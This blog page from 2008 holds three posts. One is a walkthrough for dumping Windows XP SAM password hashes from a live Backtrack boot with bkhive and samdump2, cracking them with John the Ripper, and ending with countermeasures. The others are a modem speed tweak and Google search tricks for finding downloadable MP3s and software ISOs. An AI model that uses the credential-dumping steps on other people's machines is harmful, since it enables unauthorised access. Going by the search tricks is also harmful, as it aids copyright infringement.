Cracking WindowsXP local user password with Backtrack 3

December 8, 2008

Cracking job become easy when Backtrack Linux distro come in place, and it get easier when you want crack password saved in WinXP.

Windows XP stored it username and password information in file named SAM at %SystemDrive%:\Windows\system32\config\. The SAM file is encrypted using LM hashes, which is vulnerable to rainbow table attack and bruteforce attack.

Insert the Backtrack3 CD/USB, make it a live boot up.

When you get into Backtrack 3 Desktop

On the console, type

df *to view the harddisk partition distribution on, you may find your Windows system stored at partition /mnt/hda1 (usually, as used for example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *bkhive manual
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing dumped password harsh file
cat ~/Desktop/password.txt

You will see the usersname and the hash values of the SAM file.

There are multiple way to crack the hash (johntheripper, rainbow table, LCP). Over here, we use john the ripper as example.

john ~/Desktop/password.txt –users=Administrator (Administrator is the example user name)

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasure for the attack:

  • Set boot-up password on BIOS to prevent unauthorized live boot up using CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. Strong password means combination of alphanumeric(01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length, will take much longer time (sometimes may be impossible to crack, like password “%a^&b*&e^$5*45*&^%<%” for medium-size rainbow table) to do its job.

Leave a Comment » | Security&Hacking | Tagged: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , | Permalink
Posted by kissmo

Improving dialup modem performance

October 19, 2008

You can’t assume that just because you connected at a speed like 48.3KBps that you will stay there . Today’s modems automatically fall back to a lower speed if the line noise is too high to maintain a faster connection, but sometimes they fall back too soon or too far.

Steps to speed up:

Click Start the button.
Select Settings.
Click Control Panel.
Double-click on the Modems icon.
Select your modem.
Click the Properties button.
Click the Connections tab.
Click the Advanced button.
In the “Extra settings” field, type S36=7
Click OK to save your settings.

This will force your modem to try to stay connected at high speeds in two different ways before dropping back to an asynchronous mode with auto speed buffering.Try it,this will be workink……

Leave a Comment » | performance | Tagged: , , | Permalink
Posted by kissmo

Wasting time in searching download links?

October 19, 2008

I have seen many people wasting their time in searching for download links.for example for downloading movies,they will be giving movie download in google.but this will bring you also some other sites thet are not relevant.so here are the tips for those people.

good way of finding MP3s (or other formats) is using Google and typing the following:
parent + directory + mp3 + OR + wma+ #dido#
Replace #dido# by whatever artist you wish to find, for example:
parent + directory + mp3 + OR + wma+ #Lamb#
By this you will get many dirs with MP3s or WMA files

You can do this for anything you want to download

parent + directory +  that u want download(games)
For Mp3 Searching On Google

go to google copy and paste this

?intitle:index.of? mp3

and after mp3 put in an artist or album or whatever … By this you will get lists of downloadable mp3s

eg:  ?intitle:index.of? mp3 santana

Another trick:
Use the following
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

1 Comment | Download Tricks | Tagged: , , , , , , , , , , , , , , , , , , , , , , , , , , , , | Permalink
Posted by kissmo